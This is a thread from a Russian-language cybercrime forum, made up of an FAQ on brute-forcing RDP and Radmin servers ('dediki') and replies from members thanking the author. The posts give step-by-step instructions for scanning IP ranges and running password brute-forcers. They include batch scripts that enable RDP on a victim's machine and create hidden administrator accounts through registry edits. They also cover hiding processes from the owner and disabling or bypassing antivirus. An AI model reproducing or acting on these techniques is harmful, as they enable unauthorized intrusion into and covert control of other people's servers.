MoneyMaker - здесь делают деньги! MoneyMaker - здесь делают деньги!

Форум Darkmoney Форум Дубликат
Дроп-сервис
probivbiz
Курсы по анонимности и безопасности Чат Манимейкера
Благотворительный фонд
Гарант-сервис, безопасные покупки
Lions Prime, обнал


Вернуться   MoneyMaker - здесь делают деньги! > Анонимность и безопасность > Теория и практика АиБ

Теория и практика АиБ Раздел для обсуждений вопросом по анонимности и безопасности. Статьи, книжки, вопросы и ответы.

garant
Like Tree28Likes

Ответ
 
LinkBack Опции темы Опции просмотра
Старый 20.04.2013, 23:05   #1
Гуру манимейкинга
 
Регистрация: 05.03.2013
Сообщений: 1,599
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию F.A.Q. по бруту дедиков!

Всех приветствую!
Надеюсь статья кому нибудь поможет в своих начинаниях по этой теме, и принесет пользу!

Итак, начнем.
1.Что такое дедик?
Дедик - пошло от английского слова "dedicated", что с английского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.
В двух словах это постоянно работающие компьютеры с постоянным доступом в глобальную сеть, к которым разрешено, и можно управлять удаленным доступом...

2.Для чего предназначены дедики?
Дедики можно использовать для абсолютно разных целей например для анонимного интернет серфинга, для брута, спама, можно ставить на нем игровые сервера, а также для "плохих" целей, сами знаете каких, не буду говорить))

3.Где достать дедик?
Дедик можно купить, сбрутить или добыть с помощью трояна.

4.Как зайти на дедик?

Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроется окно "Запуск программы" в нем пишем mstsc и нажимаем OK,
откроется окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ip адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"
и в поле "Пользователь" пишем имя учётки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,
появится еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике.
Чтобы зайти на него еще раз вам просто будет нужно
выбрать ip дедика и нажать Подключить и ваш компьютер автоматически введет логин и пароль к пользователю.
Когда вы это все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.

5.Брут дедиков
-Брут RDP
RDP - протокол удалённого рабочего стола.
Для брута RDP нам понадобится следующие программы(антивирус может ругаться) [Ссылки могут видеть только зарегистрированные пользователи. ](сам брут),[Ссылки могут видеть только зарегистрированные пользователи. ], [Ссылки могут видеть только зарегистрированные пользователи. ](сканер портов),[Ссылки могут видеть только зарегистрированные пользователи. ], и можно еще [Ссылки могут видеть только зарегистрированные пользователи. ](база данных IP адресов),[Ссылки могут видеть только зарегистрированные пользователи. ].
И так приступим.
1.Запустите ipgeobase выберите округ, регион или город, скопируйте все ip адреса в буфер.
2.Теперь запустите vnc_scanner_GUI и вставьте в самое большое поле все ip адреса.
Выглядит это примерно так:

Теперь нажимаем Start Scan и ждем окончания работы.
По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятся все ip адреса с открытым 3389 портом.
3.Заходите в Папку с Брутом!
Там должны быть Текстовые файлы:
good.txt
bad.txt
login.txt (Здесь будут логины, вы можете сами их придумать ... Login,User,Administrator,Admin и т.д.
password.txt (Здесь будут пароли , вы их можете найти в Интернете или сами придумать ... Password, [email protected], Passw0rd и т.д.)
Вот подкину как пример немного [Ссылки могут видеть только зарегистрированные пользователи. ].
Список других словарей [Ссылки могут видеть только зарегистрированные пользователи. ].
Успех брута во многом зависит от хорошего словаря!
Также можете скачать программы такие как [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ] для удаления одинаковых строк в текстовых файлах, поможет в составлении списка паролей для брута дедиков или иных целей.
1)Запускаем DuBrute 2.1 и нажимаем Generation.


2) Нажимаете File IP и выбираете сканированный диапазон ( айпишники )
3) Нажимаете File Login и выбираете логины ваши , они находится в папке с брутом.
4) Нажимаете File Pass и выбираете Пароли ваши, находятся там же.
5) Нажимаете Make, потом OK. И можете закрывать Окошко это.
6) Здесь надо поставить число Потоков . ( Зависит от скорости Интернета)
7) Здесь ставим от 1 до 10 вообщем, больше не надо. ( Что это? Ответ: Это повторное соединение с дедиком. То есть, если первый раз не зайдет по каким то причинам , он будет пробовать столько раз заходить , скольку у вас стоит ... Думаю Понятно. )
8. Это время с дедиком, то есть ... Если Дедик не умрет за 20 мин. то он зачислится в список good.Нажимаете ОК. Нажимаете Start. После брут RDP закончен.

Последний раз редактировалось mestniy007; 19.07.2013 в 21:21.
mestniy007 вне форума   Ответить с цитированием
Старый 20.04.2013, 23:05   #2
Гуру манимейкинга
 
Регистрация: 05.03.2013
Сообщений: 1,599
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

-Брут Radmin
1. Сам процесс брута
Radmin - программа для удалённого доступа.
Для ее брута нам понадобится [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], ipgeobase и клиент радмина [Ссылки могут видеть только зарегистрированные пользователи. ](если найдете крякнутый,выкладывайте)
1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное
Настроим его так:

закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставьте все галочки.
Вот так:

2.Запустите ipgeobase выберите округ, регион или город, скопируйте все ip адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ip адреса и нажимаем Готово.
Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.
После окончания работы можете спокойно подключаться к хостам к которым подобран пароль.
Вот и все на этом брут Radminа закончен.
2.Что делать дальше?
После того как вы сбрутили несколько радминов нам понадобится сделать с них дедик, т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).
Приступим, включить RDP можно так:
-Щелкаем Правой кнопкой мышки на Мой компьютер->Свойства
-Переходим на вкладку "Удалённые сеансы"
-Ставим везде галочки
или с помощью батника:
Код:
@Echo off
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Чтобы запустить батник на компьютере у жертвы надо с помощью передачи файлов закинуть батник в недры windows и подключиться к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat
Чтобы включить мультиюзерность надо пропатчить систему следующим патчем [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], и перезагрузить компьютер, запустить его можно также с использованием командной строки.
Вот и все теперь можете подключиться к компьютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.

6.Как создать и скрыть пользователя на дедике?
Основные способы!
1.С помощью Управление компьютером.
-Щелкаем Правой кнопкой мышки на Мой компьютер->Управление
-Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)
2.С помощю cmd.
Включаем cmd и создаем пользователя командами:
net user Имя Пароль/add
net localgroup Група администраторов Имя /add
net localgroup Група пользователей RDP Имя /add
net accounts /maxpwage:unlimited
3.С помощью батника который создает и сразу скрывает пользователя с экрана приветствий
Код:
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user Имя_пользователя Пароль /add
net localgroup %AdmGroup% Имя_пользователя /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" Имя_пользователя /add
net accounts /maxpwage:unlimited
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Имя_пользователя /t REG_DWORD /d "00000000" /f
4.С помощью программы [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], она создаст и скроет пользователя.

5.Скрыть пользователя.
Вот мы создали пользователя теперь надо скрыть его с экрана приветствия при запуске windows и в папке Documents and Settings, на скрытии в папке останавливаться не буду надеюсь все это знают.
Чтобы скрыть пользователя на экране приветствия в ветке реестра
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
нужно создать параметр типа DWORD с именем пользователя и значением 0.
Но и тут я вам предложу прогу [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], как альтернативу
Вот и все, теперь на дедике у нас есть свой скрытый пользователь.

7.Как пользоваться дедиком не создавая пользователя(под админом) и не быть замеченным?
Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ], [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ].
Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:
- Запускаем PS Tray Factory и в первых двух вкладках отмечаем приложения которые хотим скрыть и сворачиваем его(не выключаем). После этого действия пропадут окна наших программ, но останется в процессах иконка PS Tray Factory.
- Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процессы PS Tray Factory и программ которые мы хотели скрыть.
- Запускаем hidetoolz и на процессах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.
Если вы все сделали правильно то теперь наши программы работают на учетке админа полностью скрытно и он об этом даже не подозревает.
Теперь чтобы увидеть окна ваших программ включите hidetoolz и сделайте все процессы видимыми, убейте в диспетчере задач процесс PS Tray Factory, система немного залагает и покажет вам окна всех программ которые вы скрыли.

8.Что делать если антивирус на дедике удаляет ваши программы?
Объяснять для каждого антивируса очень долго но расскажу в общем виде.
Нужно создать папку где-то в недрах windows, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.
Если антивирус не разрешает изменений и просит пароль можем попытаться выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.

9.Что делать если на дедике ScreenLocker?
Как обойти новые локеры я честно говоря не знаю, но можно попытатся вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процесс локера, или вызвать командную строку с помощью [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процесс локера.

10.Как подключить свой локальный диск и буфер обмена к дедику?

Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Локальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычно диск C ) то можно будет передавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь этим потому что ваш локальный диск будет доступен всем пользователям дедика т.е. админ увидит что подключился ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоваться дедиком дальше.

11.Автоматически запустить свою прогу при входе на дедик.
Вы можете запустить свою программу при подключении (обычно программы для сбора информации) для этого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.

12.Небольшой бонус.
Для тех кто активно работает с дедами, будет полезна прога [Ссылки могут видеть только зарегистрированные пользователи. ],[Ссылки могут видеть только зарегистрированные пользователи. ]. Она создана для хранения списков учетных записей пользователей на выделенных серверах и управления ими.
Программа позволяет удобно организовать списки учетных записей, разделив их на группы, в соответствии с их целевым назначением.
Вы можете выделить серверы для личного пользования в одну группу, учетные записи с правами администратора в другую, а серверы, находящиеся в продаже или аренде, в третью.

Ну что ж экспериментируйте и все получиться!)
Если есть что поправить или добавить, пишите!
gricha, Paksius, Drug96 and 8 others like this.

Последний раз редактировалось mestniy007; 07.08.2013 в 15:20.
mestniy007 вне форума   Ответить с цитированием
Старый 21.04.2013, 05:49   #3
Забанен
 
Регистрация: 15.04.2013
Адрес: Преисподня
Сообщений: 574
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Интересная и познавательная информация, особенно для меня=) Век живи, век учись. Спасибо.
Пендальф Серый вне форума   Ответить с цитированием
Старый 21.04.2013, 05:56   #4
МОДЕРАТОР
Коллегия
 
Аватар для GH0ST
 
Регистрация: 06.03.2013
Сообщений: 1,876
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Действительно полезная информация, и не только для новичков, т.к. брутить деддики не каждый может.
Спасибо автору.
__________________
Люди тратят свое здоровье, чтобы заработать деньги, а затем тратят деньги, чтобы восстановить здоровье.

[Ссылки могут видеть только зарегистрированные пользователи. ]

[Ссылки могут видеть только зарегистрированные пользователи. ]
GH0ST вне форума   Ответить с цитированием
Старый 30.04.2013, 11:09   #5
Начинающий манимэйкер
 
Регистрация: 21.04.2013
Сообщений: 47
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Для меня как для новичка, всё придельно ясно и доходчиво описано. Спасибо.
CashSmile вне форума   Ответить с цитированием
Старый 30.04.2013, 16:30   #6
Гуру манимейкинга
 
Регистрация: 05.03.2013
Сообщений: 1,599
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Немного подкорректировал и дополнил статью. Софт обновил, перезалил и добавил нового!
Postman and ~KeNy like this.
mestniy007 вне форума   Ответить с цитированием
Старый 01.05.2013, 06:58   #7
Подающий надежды
 
Аватар для jack harris
 
Регистрация: 30.04.2013
Сообщений: 7
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
Thumbs up

Хотелось бы ещё добовить!-чтобы не подключать свои диски к деду, во избежание палева, лучше залить все свои нужные файлы в инет заранее типа на rghost и ему подобные. Автору спасибо за статью всё чётко и в тему!
jack harris вне форума   Ответить с цитированием
Старый 01.05.2013, 07:02   #8
Забанен
 
Регистрация: 25.04.2013
Сообщений: 120
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Автор молодец, узнал много нового...
~KeNy вне форума   Ответить с цитированием
Старый 01.05.2013, 07:44   #9
Начинающий манимэйкер
 
Регистрация: 06.03.2013
Сообщений: 51
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Спасибо за статью, очень полезная информация.
starmos вне форума   Ответить с цитированием
Старый 01.05.2013, 10:02   #10
Начинающий манимэйкер
 
Регистрация: 01.05.2013
Сообщений: 120
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию

Хорошая статья получилась, новичкам самое то
Александр Малкович вне форума   Ответить с цитированием
Ответ

Метки
анонимность, брут., взлом, дедики

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.



Текущее время: 10:17. Часовой пояс GMT.

Bes73 Bes73
garant
garant

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2020, vBulletin Solutions, Inc. Перевод:
Search Engine Optimization by vBSEOzCarot
MoneyMaker.hk